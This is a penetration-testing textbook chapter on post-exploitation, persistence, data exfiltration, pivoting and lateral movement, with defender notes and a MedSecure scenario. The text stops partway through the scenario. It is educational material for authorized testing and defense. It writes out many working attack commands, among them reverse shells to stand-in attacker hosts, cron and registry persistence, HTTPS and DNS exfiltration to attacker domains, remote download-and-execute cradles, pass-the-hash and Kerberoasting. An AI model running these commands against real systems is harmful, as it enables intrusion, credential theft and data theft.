You have obtained a shell on a target system during an authorized penetration test. Perhaps you exploited a vulnerable web application, leveraged a misconfigured service, or capitalized on a weak credential. The command prompt blinks, waiting for...
In This Chapter
- Introduction: What Happens After the Shell
- 24.1 Post-Exploitation Objectives
- 24.2 Maintaining Access: Persistence Mechanisms
- 24.3 Data Exfiltration
- 24.4 Pivoting and Tunneling
- 24.5 Lateral Movement Strategies
- 24.6 Advanced Post-Exploitation Techniques
- 24.7 The MedSecure Post-Exploitation Scenario
- 24.8 Cleaning Up Responsibly
- 24.9 Post-Exploitation Reporting: Telling the Attack Story
- 24.10 Post-Exploitation in the ShopStack and Student Lab Environments
- 24.11 Anti-Forensics and Operational Security
- 24.12 Credential Harvesting Deep Dive
- 24.13 Ethical and Legal Considerations
- 24.14 The Penetration Test Kill Chain: Post-Exploitation in Context
- 24.15 Summary
- Review Questions
Chapter 24: Post-Exploitation and Pivoting
Introduction: What Happens After the Shell
You have obtained a shell on a target system during an authorized penetration test. Perhaps you exploited a vulnerable web application, leveraged a misconfigured service, or capitalized on a weak credential. The command prompt blinks, waiting for input. Now what?
This moment -- the transition from initial access to post-exploitation -- is where the real depth of a penetration test begins. Many aspiring ethical hackers invest enormous energy in learning exploitation techniques but give comparatively little thought to what follows. In reality, the post-exploitation phase is where the most consequential findings emerge, where the true impact of a vulnerability chain becomes clear, and where the difference between a superficial scan report and a transformative security assessment reveals itself.
Post-exploitation is the set of activities conducted after gaining initial access to a target system. These activities include escalating privileges, establishing persistent access, moving laterally through the network, exfiltrating data (in a controlled manner to demonstrate impact), and ultimately achieving the objectives defined in the engagement's rules of engagement. Pivoting, a closely related concept, refers to using a compromised system as a launching point to access other systems or network segments that were previously unreachable from the attacker's original position.
In the real world, advanced threat actors rarely stop at a single compromised host. The SolarWinds supply chain attack attributed to APT29 demonstrated how nation-state actors pivot from initial footholds through entire enterprise environments, moving from on-premises infrastructure to cloud systems with devastating effectiveness. Similarly, the 2022 Uber breach showed how even a teenager could leverage social engineering and post-exploitation techniques to pivot through internal systems using nothing more than Slack and a compromised VPN credential.
For the ethical hacker, post-exploitation serves a critical purpose: demonstrating the real-world impact of vulnerabilities. A SQL injection vulnerability that yields a low-privileged database user account might seem moderate in isolation. But if that account enables lateral movement to an Active Directory domain controller, which in turn provides access to sensitive patient records, the true severity becomes unmistakable. Post-exploitation transforms theoretical vulnerabilities into concrete business risks.
Authorized Testing Only: Every technique described in this chapter must only be performed within the scope of a signed, written authorization agreement. Post-exploitation activities carry significant risk of disrupting production systems, triggering security alerts, and exposing sensitive data. Always coordinate with the client's security team and adhere strictly to the rules of engagement.
Blue Team Perspective: Understanding post-exploitation techniques is essential for defenders. By learning how attackers maintain access, move laterally, and exfiltrate data, blue teams can implement detection mechanisms, segment networks effectively, and develop incident response playbooks that address real threat behaviors rather than theoretical attack models.
24.1 Post-Exploitation Objectives
Post-exploitation is not aimless exploration. Professional penetration testers approach this phase with clear objectives that align with the engagement scope and the client's security concerns. Understanding these objectives provides structure to what might otherwise become an unfocused wandering through compromised systems.
24.1.1 Situational Awareness
The first task after gaining access is understanding the compromised environment. This includes identifying the operating system and version, installed software, running processes, network configuration, logged-in users, and the system's role within the broader infrastructure.
On a Linux system, initial reconnaissance might look like this:
# System information
uname -a
cat /etc/os-release
hostname
# Network configuration
ip addr show
ip route show
cat /etc/resolv.conf
# Current user context
id
whoami
sudo -l
# Running processes
ps aux
# Installed packages (Debian/Ubuntu)
dpkg -l | head -50
# Scheduled tasks
crontab -l
ls -la /etc/cron.*
# Network connections
ss -tulpn
netstat -antup
On Windows, the equivalent commands include:
# System information
systeminfo
hostname
# Network configuration
ipconfig /all
route print
# Current user context
whoami /all
net user %username%
# Running processes
tasklist /v
wmic process list brief
# Installed software
wmic product get name,version
# Scheduled tasks
schtasks /query /fo list /v
# Network connections
netstat -ano
In MedSecure's penetration test scenario, after compromising a web server through a deserialization vulnerability, the tester discovers the server has dual network interfaces -- one connected to the DMZ (10.10.10.0/24) and another to an internal management VLAN (172.16.5.0/24). This discovery transforms a web server compromise into a potential gateway to the entire internal network.
24.1.2 Privilege Escalation
Initial access often comes with limited privileges. A web shell might run as the www-data user on Linux or IIS APPPOOL\DefaultAppPool on Windows. Privilege escalation -- obtaining higher-level access such as root or SYSTEM -- is frequently necessary to achieve engagement objectives.
Common privilege escalation vectors on Linux include:
- SUID binaries: Programs with the SUID bit set run with the file owner's privileges, often root. Misconfigured SUID binaries can be abused for escalation.
- Sudo misconfigurations: Users permitted to run specific commands via
sudowithout proper restriction can sometimes chain commands to obtain full root access. - Kernel exploits: Unpatched kernels may contain vulnerabilities (such as Dirty Pipe, CVE-2022-0847) that allow privilege escalation.
- Writable cron jobs: If a scheduled task runs as root and references writable scripts or directories, an attacker can inject malicious code.
- Credential harvesting: Configuration files, history files, and environment variables may contain passwords or API keys.
On Windows, common vectors include:
- Unquoted service paths: Services with paths containing spaces and without quotes can be hijacked.
- Weak service permissions: If a low-privileged user can modify a service binary or configuration, they can escalate to SYSTEM.
- Token impersonation: Techniques such as Potato attacks (JuicyPotato, PrintSpoofer, GodPotato) abuse Windows token impersonation.
- AlwaysInstallElevated: A misconfigured Group Policy setting that allows any MSI to install with SYSTEM privileges.
- DLL hijacking: Applications that load DLLs from writable directories can be forced to load malicious code.
Tools like LinPEAS and WinPEAS automate the discovery of these vectors, but understanding the underlying mechanisms is essential for situations where automated tools are blocked or unavailable.
24.1.3 Information Gathering
Post-exploitation information gathering goes far beyond the initial reconnaissance performed before exploitation. With system-level access, the tester can access:
- Credential stores: SAM database (Windows), /etc/shadow (Linux), browser saved passwords, keychain entries, credential manager vaults
- Configuration files: Database connection strings, API keys, service account credentials, SSH keys
- Email and documents: Sensitive business documents, internal communications, intellectual property
- Active Directory data: Domain structure, Group Policy Objects, trust relationships, privileged accounts
- Network shares: File servers, backup locations, shared drives with sensitive data
Blue Team Perspective: Defenders should implement Data Loss Prevention (DLP) solutions, monitor for unusual file access patterns, and restrict unnecessary access to sensitive data stores. Credential hygiene practices -- including regular rotation, privileged access workstations, and credential tiering -- significantly increase the difficulty of post-exploitation information gathering.
24.1.4 Defining Success Criteria
Professional engagements define specific objectives, or "flags," that the testing team attempts to achieve. These might include:
- Accessing a specific database containing customer records
- Compromising a domain administrator account
- Reaching a segmented network (such as a PCI cardholder data environment)
- Demonstrating the ability to deploy (simulated) ransomware
- Exfiltrating synthetic test data past security controls
In MedSecure's engagement, the primary objective is demonstrating whether an external attacker can access patient health records stored in a segmented database environment. Every post-exploitation action should work toward this goal while remaining within the authorized scope.
24.2 Maintaining Access: Persistence Mechanisms
Persistence refers to techniques that allow continued access to a compromised system even after reboots, credential changes, or other disruptions. While persistence is a hallmark of real-world adversaries, ethical hackers must implement it judiciously -- only when explicitly authorized and always with documentation for later removal.
24.2.1 Why Persistence Matters in Testing
During multi-day engagements, maintaining access is practical necessity. Re-exploiting a vulnerability each morning wastes time and may trigger additional security alerts. Persistence mechanisms allow the tester to resume work efficiently.
However, persistence introduces risk. Every backdoor or implant represents a potential vulnerability if discovered by an unauthorized party during the engagement. Testers must:
- Document every persistence mechanism installed
- Use unique, hard-to-guess authentication for implants
- Remove all persistence mechanisms during cleanup
- Encrypt communications between implants and command infrastructure
24.2.2 Linux Persistence Techniques
SSH Key Injection: Adding an authorized SSH key to a user's ~/.ssh/authorized_keys file provides quiet, encrypted access that blends with normal SSH traffic.
# Generate a dedicated key pair for the engagement
ssh-keygen -t ed25519 -f /tmp/pentest_key -N "" -C "pentest-engagement-2024"
# On the target, add the public key
mkdir -p ~/.ssh
chmod 700 ~/.ssh
echo "ssh-ed25519 AAAA... pentest-engagement-2024" >> ~/.ssh/authorized_keys
chmod 600 ~/.ssh/authorized_keys
Cron Job Persistence: A cron job can periodically execute a reverse shell or beacon.
# Create a cron job that runs every 15 minutes
(crontab -l 2>/dev/null; echo "*/15 * * * * /bin/bash -c 'bash -i >& /dev/tcp/CALLBACK_IP/443 0>&1'") | crontab -
Systemd Service: A custom systemd unit file provides persistence that survives reboots and can be configured to restart automatically.
# /etc/systemd/system/update-checker.service
[Unit]
Description=System Update Checker
After=network.target
[Service]
Type=simple
ExecStart=/opt/.update/beacon
Restart=always
RestartSec=60
[Install]
WantedBy=multi-user.target
Shared Library Hijacking (LD_PRELOAD): Injecting a malicious shared library via /etc/ld.so.preload causes every dynamically linked program to load the attacker's code.
24.2.3 Windows Persistence Techniques
Registry Run Keys: Adding entries to HKCU\Software\Microsoft\Windows\CurrentVersion\Run or the HKLM equivalent causes programs to execute at login.
# User-level persistence (no admin required)
reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "SystemUpdate" /t REG_SZ /d "C:\Users\Public\beacon.exe" /f
# System-level persistence (requires admin)
reg add "HKLM\Software\Microsoft\Windows\CurrentVersion\Run" /v "SystemUpdate" /t REG_SZ /d "C:\Windows\Temp\beacon.exe" /f
Scheduled Tasks: Windows Task Scheduler provides sophisticated persistence options.
# Create a scheduled task that runs at logon
schtasks /create /tn "WindowsUpdate" /tr "C:\Users\Public\beacon.exe" /sc onlogon /ru SYSTEM
WMI Event Subscriptions: Windows Management Instrumentation (WMI) event subscriptions provide a stealthy persistence mechanism that does not leave obvious artifacts in common locations.
DLL Search Order Hijacking: Placing a malicious DLL in a directory searched before the legitimate DLL location causes applications to load the attacker's code.
Golden Ticket / Silver Ticket Attacks: In Active Directory environments, forging Kerberos tickets provides persistent access that survives password changes (until the KRBTGT password is changed twice for Golden Tickets).
Blue Team Perspective: Monitor for common persistence indicators: new scheduled tasks, registry Run key modifications, new services, unauthorized SSH keys, and unusual cron entries. Tools like Autoruns (Sysinternals), osquery, and EDR platforms can detect many persistence mechanisms. Implementing application whitelisting significantly reduces the effectiveness of persistence techniques.
24.2.4 Command and Control (C2) Frameworks
Professional penetration testers often use Command and Control (C2) frameworks to manage compromised hosts. These frameworks provide structured interfaces for commanding multiple implants, managing persistence, and executing post-exploitation modules.
Popular C2 frameworks in the ethical hacking community include:
- Cobalt Strike: Commercial framework widely used in professional penetration testing. Its Beacon implant supports multiple communication protocols and advanced evasion.
- Sliver: Open-source C2 framework developed by BishopFox. Supports mutual TLS, HTTP(S), DNS, and WireGuard communication.
- Mythic: Open-source, cross-platform C2 framework with a web-based interface and support for multiple agent types.
- Havoc: Modern, open-source C2 framework with a focus on evasion and flexibility.
- Metasploit Framework: While primarily an exploitation framework, Meterpreter provides robust post-exploitation capabilities.
The choice of C2 framework depends on engagement requirements, target environment, and the need to evade specific security controls. In environments with mature EDR solutions, the tester may need to customize implants or use less common frameworks to avoid detection.
24.3 Data Exfiltration
Data exfiltration -- the unauthorized transfer of data from a target environment -- is a critical objective for many real-world attackers and a common demonstration goal in penetration tests. Understanding exfiltration techniques helps testers demonstrate impact and helps defenders implement appropriate countermeasures.
24.3.1 Exfiltration Channels
Attackers and testers use various channels to extract data from compromised environments:
HTTP/HTTPS: Web traffic is almost always allowed outbound, making it the most common exfiltration channel. Data can be encoded in URL parameters, POST bodies, or custom headers.
import requests
import base64
# Simple HTTPS exfiltration (for demonstration purposes)
data = open("/path/to/sensitive_file", "rb").read()
encoded = base64.b64encode(data).decode()
# Chunked exfiltration to avoid large transfer detection
chunk_size = 1024
for i in range(0, len(encoded), chunk_size):
chunk = encoded[i:i+chunk_size]
requests.post("https://exfil-server.example.com/api/log",
json={"data": chunk, "seq": i // chunk_size},
verify=False)
DNS: DNS queries are rarely blocked entirely, making DNS tunneling a reliable exfiltration method. Data is encoded in subdomain labels of DNS queries to an attacker-controlled authoritative DNS server.
# DNS exfiltration concept (using dig)
# Each query carries a small amount of data in the subdomain
data_chunk="$(echo 'sensitive data' | base64 | tr -d '=')"
dig "${data_chunk}.exfil.attacker-domain.com" TXT
Tools like dnscat2 and iodine automate DNS tunneling for both data exfiltration and interactive shell access.
ICMP: Data can be embedded in ICMP echo request/reply packets. While unusual ICMP traffic patterns may be detected, some environments do not inspect ICMP payload contents.
Cloud Storage: If the target environment has access to cloud storage services (AWS S3, Azure Blob, Google Cloud Storage), data can be uploaded to attacker-controlled storage buckets using legitimate cloud APIs that blend with normal traffic.
Email: Sending data via email (SMTP) is another exfiltration vector, particularly effective in environments where email is heavily used.
24.3.2 Staging and Compression
Before exfiltration, data is typically staged -- collected into a single location, compressed, and often encrypted to avoid content-based detection.
# Stage, compress, and encrypt data for exfiltration
# Create a staging directory
mkdir /tmp/.staging
# Copy target data
cp /var/www/app/config/database.yml /tmp/.staging/
cp /home/admin/.ssh/id_rsa /tmp/.staging/
# Compress and encrypt
tar czf - /tmp/.staging/ | openssl enc -aes-256-cbc -salt -pbkdf2 -out /tmp/.staging/data.enc -pass pass:EngagementKey2024
# Clean up staging directory
rm -rf /tmp/.staging/
24.3.3 Exfiltration Detection and Prevention
Blue Team Perspective: Implementing robust exfiltration detection requires a layered approach:
- Network monitoring: Analyze outbound traffic for unusual volumes, destinations, and protocols. Beaconing detection can identify regular, periodic communications typical of C2 and exfiltration tools.
- DNS monitoring: Monitor for unusually long DNS queries, high query volumes to single domains, and queries to newly registered domains.
- DLP solutions: Deploy Data Loss Prevention tools that inspect outbound traffic for sensitive data patterns (credit card numbers, social security numbers, medical record identifiers).
- Egress filtering: Restrict outbound traffic to necessary ports and protocols. Require proxy authentication for web traffic. Block direct DNS queries and force all DNS through monitored resolvers.
- Endpoint monitoring: EDR solutions can detect file staging activities, compression of sensitive directories, and use of common exfiltration tools.
In MedSecure's environment, the penetration tester creates a synthetic dataset mimicking patient record format (never using real patient data) and attempts to exfiltrate it through various channels. The tester discovers that while HTTPS exfiltration is blocked by the proxy's content inspection, DNS tunneling succeeds because the organization allows direct DNS queries to external resolvers -- a finding that leads to a critical recommendation in the final report.
24.4 Pivoting and Tunneling
Pivoting is perhaps the most technically fascinating aspect of post-exploitation. It transforms a single compromised host into a bridge that extends the attacker's reach into otherwise inaccessible network segments. Understanding pivoting is essential for both testers who need to demonstrate the full impact of network segmentation failures and defenders who need to understand how segmentation can be bypassed.
24.4.1 The Concept of Pivoting
Consider a typical corporate network architecture:
[Internet] --> [Firewall] --> [DMZ: Web Servers]
|
[Internal FW]
|
[Corporate LAN]
|
[Segmented Networks]
/ | \
[Dev/Test] [Database] [Management]
An attacker who compromises a web server in the DMZ cannot directly access the database segment. However, if the web server has network connectivity to the corporate LAN (perhaps for authentication or database queries), the attacker can use the web server as a pivot point to reach internal systems.
24.4.2 SSH Tunneling
SSH tunneling is one of the most versatile pivoting techniques. If SSH access is available on a compromised host, the attacker can create tunnels that forward traffic through the SSH connection.
Local Port Forwarding: Forwards a port on the attacker's machine through the compromised host to a target on the internal network.
# Forward local port 8080 through pivot host to internal web server
ssh -L 8080:172.16.5.100:80 user@pivot-host
# Now accessing localhost:8080 reaches the internal web server
curl http://localhost:8080
Dynamic Port Forwarding (SOCKS Proxy): Creates a SOCKS proxy that allows routing arbitrary traffic through the pivot host.
# Create a SOCKS5 proxy on local port 1080
ssh -D 1080 user@pivot-host
# Use proxychains to route tools through the SOCKS proxy
proxychains nmap -sT -Pn 172.16.5.0/24
# Or configure individual tools
curl --socks5 localhost:1080 http://172.16.5.100
Remote Port Forwarding: Opens a port on the compromised host that forwards to a resource accessible from the attacker's machine.
# Open port 4444 on the pivot host, forwarding to attacker's port 443
ssh -R 4444:localhost:443 user@pivot-host
Multi-Hop Pivoting with SSH: Chaining SSH tunnels through multiple pivot points enables reaching deeply segmented networks.
# ProxyJump through multiple hosts
ssh -J user@pivot1,user@pivot2 user@final-target
# SSH config for persistent multi-hop setup
# ~/.ssh/config
Host pivot1
HostName 10.10.10.50
User admin
Host pivot2
HostName 172.16.5.20
User svc_admin
ProxyJump pivot1
Host target
HostName 192.168.100.10
User dbadmin
ProxyJump pivot2
24.4.3 Chisel: HTTP-Based Tunneling
Chisel is a fast TCP/UDP tunnel transported over HTTP, secured via SSH. It is particularly useful when SSH is not available on the pivot host but HTTP outbound connections are permitted.
Setting up Chisel:
# On the attacker's machine (server mode)
./chisel server --reverse --port 8443 --socks5
# On the compromised host (client mode)
./chisel client ATTACKER_IP:8443 R:socks
# This creates a SOCKS5 proxy on the attacker's machine
# that routes through the compromised host
proxychains nmap -sT -Pn 172.16.5.0/24
Chisel's advantages include:
- Single binary, no dependencies, cross-platform
- Traffic travels over HTTP/HTTPS, bypassing many firewalls
- Built-in SSH encryption layer
- Supports reverse tunneling (client initiates connection to server)
- Can tunnel through corporate proxies
24.4.4 Ligolo-ng: Advanced Pivoting
Ligolo-ng is a modern tunneling tool that creates a virtual network interface, allowing tools to interact with the target network as if directly connected. Unlike SOCKS-based solutions, Ligolo-ng supports all protocols, not just TCP.
Setting up Ligolo-ng:
# On the attacker's machine, start the proxy
sudo ip tuntap add user $(whoami) mode tun ligolo
sudo ip link set ligolo up
./proxy -selfcert -laddr 0.0.0.0:11601
# On the compromised host, start the agent
./agent -connect ATTACKER_IP:11601 -ignore-cert
# In the Ligolo proxy interface:
# > session (select the agent session)
# > ifconfig (view target network interfaces)
# > start (start the tunnel)
# Add a route for the target network
sudo ip route add 172.16.5.0/24 dev ligolo
# Now tools work directly against the internal network
nmap -sV 172.16.5.0/24
Ligolo-ng's TUN-based approach offers significant advantages:
- Full protocol support (TCP, UDP, ICMP)
- No SOCKS proxy configuration required
- Tools work natively without proxychains
- Better performance than SOCKS-based solutions
- Support for multiple listeners (double pivoting)
24.4.5 Meterpreter Pivoting
Metasploit's Meterpreter provides built-in pivoting capabilities through the autoroute module and SOCKS proxy.
# In a Meterpreter session
meterpreter > run autoroute -s 172.16.5.0/24
meterpreter > background
# Start a SOCKS proxy
msf6 > use auxiliary/server/socks_proxy
msf6 auxiliary(server/socks_proxy) > set SRVPORT 1080
msf6 auxiliary(server/socks_proxy) > run
# Use proxychains with other tools
proxychains nmap -sT -Pn 172.16.5.0/24
24.4.6 Windows-Specific Pivoting
In Windows environments, additional pivoting techniques are available:
netsh Port Forwarding: Windows' built-in netsh command can create port forwards without additional tools.
# Forward port 8080 on the compromised host to internal target
netsh interface portproxy add v4tov4 listenport=8080 listenaddress=0.0.0.0 connectport=80 connectaddress=172.16.5.100
# List existing port forwards
netsh interface portproxy show all
# Remove the forward
netsh interface portproxy delete v4tov4 listenport=8080 listenaddress=0.0.0.0
PuTTY/Plink: On Windows hosts with PuTTY installed, plink provides SSH tunneling capabilities.
# SOCKS proxy via plink
plink.exe -D 1080 user@attacker-host
SMB Named Pipes: In Active Directory environments, pivoting over SMB named pipes allows lateral movement using legitimate Windows protocols that blend with normal domain traffic.
24.4.7 Double and Triple Pivoting
Complex environments may require chaining pivots through multiple compromised hosts. This is conceptually similar to multi-hop SSH, but with tools like Chisel or Ligolo-ng:
Attacker --> Pivot1 (DMZ) --> Pivot2 (Corporate LAN) --> Target (Database Segment)
With Chisel, double pivoting requires running a Chisel server on Pivot1 and a Chisel client on Pivot2 that connects through Pivot1's tunnel. With Ligolo-ng, double pivoting is achieved by running a second listener within an established tunnel session and connecting a new agent through it.
Blue Team Perspective: Detect pivoting by monitoring for unusual internal traffic patterns. A web server in the DMZ suddenly initiating connections to numerous internal hosts on management ports is a strong indicator of compromise. Network segmentation should be enforced with deny-by-default rules, not just allowing traffic from the DMZ to specific internal services. Monitor for known tunneling tools (Chisel, Ligolo, plink) and unusual SSH connections from servers that normally do not initiate SSH sessions.
24.5 Lateral Movement Strategies
Lateral movement is the process of moving from one compromised system to other systems within the network. While pivoting establishes the network path, lateral movement involves actually authenticating to and gaining control of additional hosts.
24.5.1 Credential-Based Lateral Movement
The most common lateral movement technique leverages harvested credentials:
Pass-the-Hash (PtH): Windows NTLM authentication allows authenticating with a password hash rather than the plaintext password. If an attacker obtains NTLM hashes (from memory, SAM database, or network capture), they can authenticate to other systems without cracking the passwords.
# Pass-the-Hash with CrackMapExec
crackmapexec smb 172.16.5.0/24 -u Administrator -H aad3b435b51404eeaad3b435b51404ee:8846f7eaee8fb117ad06bdd830b7586c
# Pass-the-Hash with Impacket's psexec
python3 psexec.py -hashes aad3b435b51404ee:8846f7eaee8fb117ad06bdd830b7586c Administrator@172.16.5.100
# Pass-the-Hash with evil-winrm
evil-winrm -i 172.16.5.100 -u Administrator -H 8846f7eaee8fb117ad06bdd830b7586c
Pass-the-Ticket (PtT): In Kerberos environments, captured or forged Kerberos tickets can be used for authentication.
# Export Kerberos tickets (Mimikatz)
sekurlsa::tickets /export
# Inject a ticket
kerberos::ptt ticket.kirbi
# Use Impacket with Kerberos
export KRB5CCNAME=/path/to/ticket.ccache
python3 psexec.py -k -no-pass target.domain.local
Overpass-the-Hash: Converting an NTLM hash into a Kerberos ticket, combining the simplicity of PtH with Kerberos authentication.
24.5.2 Remote Execution Methods
Once credentials are available, various remote execution methods can deploy commands or implants on target systems:
| Method | Protocol | Port | Requires Admin | Stealth Level |
|---|---|---|---|---|
| PsExec | SMB | 445 | Yes | Low (creates service) |
| WMI | DCOM/WMI | 135 | Yes | Medium |
| WinRM | HTTP(S) | 5985/5986 | Yes* | Medium |
| DCOM | DCOM | 135 | Yes | Medium-High |
| SMB Exec | SMB | 445 | Yes | Medium |
| SSH | SSH | 22 | Depends | High (encrypted) |
| RDP | RDP | 3389 | Yes* | Low (interactive) |
| PowerShell Remoting | WinRM | 5985/5986 | Yes* | Medium |
*May be available to non-admin users if specifically configured.
24.5.3 Active Directory Lateral Movement
Active Directory environments present unique lateral movement opportunities:
Kerberoasting: Requesting service tickets for accounts with Service Principal Names (SPNs) and cracking them offline to obtain plaintext passwords.
# Kerberoasting with Impacket
python3 GetUserSPNs.py domain.local/user:password -dc-ip 172.16.5.1 -request -outputfile kerberoast.txt
# Crack with hashcat
hashcat -m 13100 kerberoast.txt wordlist.txt
AS-REP Roasting: Targeting accounts that do not require Kerberos pre-authentication.
# AS-REP Roasting with Impacket
python3 GetNPUsers.py domain.local/ -dc-ip 172.16.5.1 -usersfile users.txt -format hashcat -outputfile asrep.txt
Unconstrained and Constrained Delegation: Abusing Kerberos delegation configurations to impersonate users and access services on their behalf.
Group Policy Preferences (GPP): Legacy Group Policy Preferences may contain encrypted credentials that can be trivially decrypted using the publicly known AES key.
ADCS (Active Directory Certificate Services) Abuse: Misconfigured certificate templates can be exploited to obtain certificates that enable authentication as any domain user, including domain administrators. The ESC1-ESC8 attack vectors discovered by SpecterOps researchers have become a major focus of Active Directory assessments.
24.5.4 Linux Lateral Movement
In Linux environments, lateral movement commonly leverages:
- SSH keys: Harvested private keys stored on compromised systems
- Shared credentials: Reused passwords across systems (especially service accounts)
- NFS shares: Misconfigured exports with root squash disabled
- Ansible/Salt/Puppet: Configuration management tools that provide administrative access to managed hosts
- Container escape: Breaking out of Docker or Kubernetes containers to access the underlying host or other containers
24.5.5 Lateral Movement in Cloud Environments
Cloud environments introduce new lateral movement paradigms:
- IAM role assumption: Assuming other IAM roles with broader permissions
- Metadata service exploitation: Accessing instance metadata to obtain temporary credentials (IMDS)
- Cross-account access: Leveraging trust relationships between cloud accounts
- Service principal abuse: Using compromised service principals to access other cloud resources
- Shared storage: Accessing cloud storage buckets, file shares, or databases with harvested credentials
In the SolarWinds attack, APT29 famously pivoted from on-premises Active Directory to Azure AD by forging SAML tokens, demonstrating how lateral movement increasingly spans the boundary between traditional and cloud infrastructure.
Blue Team Perspective: Defend against lateral movement with defense-in-depth: implement network segmentation with microsegmentation where possible, deploy EDR on all endpoints, enable and monitor Windows event logs (especially Event IDs 4624, 4625, 4648, 4672, 4768, 4769, 4776), implement Local Administrator Password Solution (LAPS) to prevent password reuse, disable legacy protocols (NTLM where possible), and adopt a Zero Trust architecture that verifies every access request regardless of network location.
24.6 Advanced Post-Exploitation Techniques
Beyond the fundamental techniques covered above, several advanced post-exploitation methods deserve attention for their effectiveness in modern environments.
24.6.1 Living Off the Land (LOL)
Living off the Land Binaries (LOLBins) are legitimate system binaries that can be repurposed for malicious activities. Because these binaries are signed by the operating system vendor and expected to be present on every system, they bypass many security controls including application whitelisting.
Common LOLBins for post-exploitation include:
Windows LOLBins:
- certutil.exe: Download files, encode/decode data, manage certificates
- mshta.exe: Execute HTA files containing scripts
- rundll32.exe: Execute DLL exports, including JavaScript
- regsvr32.exe: Execute scriptlets from remote URLs
- bitsadmin.exe: Download files using the Background Intelligent Transfer Service
- wmic.exe: Execute commands, gather system information, create processes
- msiexec.exe: Install MSI packages from remote locations
- powershell.exe: Execute scripts, download files, interact with .NET
# Download a file using certutil (LOLBin)
certutil -urlcache -split -f http://attacker/tool.exe C:\Users\Public\tool.exe
# Download using bitsadmin
bitsadmin /transfer job /download /priority high http://attacker/tool.exe C:\Users\Public\tool.exe
# Execute a remote scriptlet via regsvr32
regsvr32 /s /n /u /i:http://attacker/payload.sct scrobj.dll
Linux LOLBins:
- curl / wget: Download files and exfiltrate data
- python / python3: Execute scripts, create reverse shells, encode data
- perl / ruby: Alternative scripting for reverse shells and data processing
- socat: Create reverse shells, port forwarding, file transfer
- openssl: Encrypted file transfer, reverse shells with encryption
- ncat / nc: Network connections, reverse shells, file transfer
# Encrypted reverse shell using openssl (LOLBin)
# On attacker: openssl s_server -quiet -key key.pem -cert cert.pem -port 443
mkfifo /tmp/s; /bin/sh -i < /tmp/s 2>&1 | openssl s_client -quiet -connect ATTACKER:443 > /tmp/s; rm /tmp/s
# Python reverse shell
python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("ATTACKER",443));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);subprocess.call(["/bin/sh","-i"])'
# File download with curl piped to bash (dangerous, for authorized testing only)
curl http://attacker/script.sh | bash
The LOLBAS project (lolbas-project.github.io) for Windows and GTFOBins (gtfobins.github.io) for Linux maintain comprehensive databases of these binaries and their offensive capabilities.
Blue Team Perspective: Detecting LOLBin abuse requires behavioral monitoring rather than signature-based detection. EDR solutions should alert on unusual process lineage (e.g., certutil.exe downloading files, wmic.exe spawning child processes), unusual command-line arguments for common binaries, and network connections from binaries that should not communicate externally. Implementing application control policies that restrict how LOLBins can be used (without blocking their legitimate functions) provides strong defense.
24.6.2 Memory-Only Malware and Fileless Techniques
Sophisticated attackers increasingly operate entirely in memory, leaving minimal artifacts on disk that could be detected by traditional antivirus or forensic analysis.
Fileless techniques include:
- PowerShell in memory: Loading and executing .NET assemblies directly in memory without writing to disk
- Reflective DLL injection: Loading DLLs directly from memory into a process without using the standard Windows loader
- Process hollowing: Creating a legitimate process in a suspended state, replacing its code in memory with malicious code, then resuming execution
- Thread injection: Injecting code into the memory space of a running legitimate process
# Load a .NET assembly directly into memory (fileless execution)
$assembly = [System.Reflection.Assembly]::Load(
(New-Object System.Net.WebClient).DownloadData(
"http://attacker/payload.dll"
)
)
# Execute in-memory using Invoke-Expression
IEX (New-Object Net.WebClient).DownloadString("http://attacker/script.ps1")
# AMSI bypass attempt (for authorized testing against your own systems)
# Note: This is frequently updated; specific bypasses change rapidly
Modern EDR solutions detect many fileless techniques through: - AMSI (Antimalware Scan Interface) integration with PowerShell and scripting engines - ETW (Event Tracing for Windows) monitoring for process injection - Memory scanning for known implant signatures - Behavioral analysis of process trees and system calls
24.6.3 Token Manipulation and Impersonation
Windows access tokens control what privileges and access rights a process has. Manipulating tokens is a powerful post-exploitation technique:
Token Impersonation: If a process can access another user's token (typically requiring SeImpersonatePrivilege), it can impersonate that user. Services like IIS and SQL Server commonly have this privilege, making compromised service accounts valuable targets.
Token Theft: Using tools like Mimikatz or Cobalt Strike's steal_token command, an attacker can list all tokens available on a system and impersonate any logged-in user.
Potato Attacks: A family of privilege escalation techniques (Hot Potato, Juicy Potato, Sweet Potato, Rogue Potato, PrintSpoofer, GodPotato) that abuse Windows token impersonation from service accounts to achieve SYSTEM-level access.
# Using Mimikatz for token manipulation
# List available tokens
token::list
# Impersonate a specific user's token
token::elevate /domainadmin
# Revert to original token
token::revert
24.6.4 Post-Exploitation Automation with BloodHound
BloodHound is an essential tool for understanding and navigating Active Directory environments during post-exploitation. It ingests Active Directory data and uses graph theory to identify the shortest path from the current position to domain administration.
BloodHound reveals: - Attack paths: The shortest path from any compromised user to domain admin - Kerberoastable accounts: Service accounts vulnerable to offline password cracking - AS-REP Roastable accounts: Accounts without pre-authentication that can be attacked offline - Delegation configurations: Unconstrained and constrained delegation that can be abused - Group membership chains: Nested group memberships that provide unexpected privileges - ACL-based attack paths: Discretionary access control entries that allow password resets, group additions, or object modification
# Collect Active Directory data with SharpHound
# (the BloodHound data collector)
.\SharpHound.exe -c all
# Or use the Python collector (bloodhound-python)
bloodhound-python -u user -p password -d domain.local -ns DC_IP -c all
The data collected by SharpHound is imported into BloodHound's Neo4j graph database, where it can be queried to find attack paths. The visual representation of these paths is invaluable for both penetration test reports and defensive remediation planning.
Blue Team Perspective: Run BloodHound regularly against your own Active Directory to identify and remediate attack paths before attackers find them. Focus remediation on "chokepoint" objects that appear in multiple attack paths. Monitor for SharpHound data collection activity (large LDAP queries, excessive DNS lookups).
24.7 The MedSecure Post-Exploitation Scenario
Let us walk through MedSecure's penetration test to illustrate how post-exploitation and pivoting combine in a realistic engagement.
Phase 1: Initial Access
The tester exploits a Java deserialization vulnerability in MedSecure's patient portal (10.10.10.50), obtaining a reverse shell as the tomcat user.
Phase 2: Situational Awareness
# The tester discovers dual network interfaces
ip addr show
# eth0: 10.10.10.50/24 (DMZ)
# eth1: 172.16.5.50/24 (Internal Management)
# The tester identifies interesting internal hosts
# by examining the application's database configuration
cat /opt/tomcat/webapps/portal/WEB-INF/database.properties
# db.host=172.16.5.200
# db.user=portal_svc
# db.password=M3dS3cur3!DB
Phase 3: Privilege Escalation
The tester discovers a cron job running as root that executes a script from a writable directory:
# Writable backup script executed by root cron
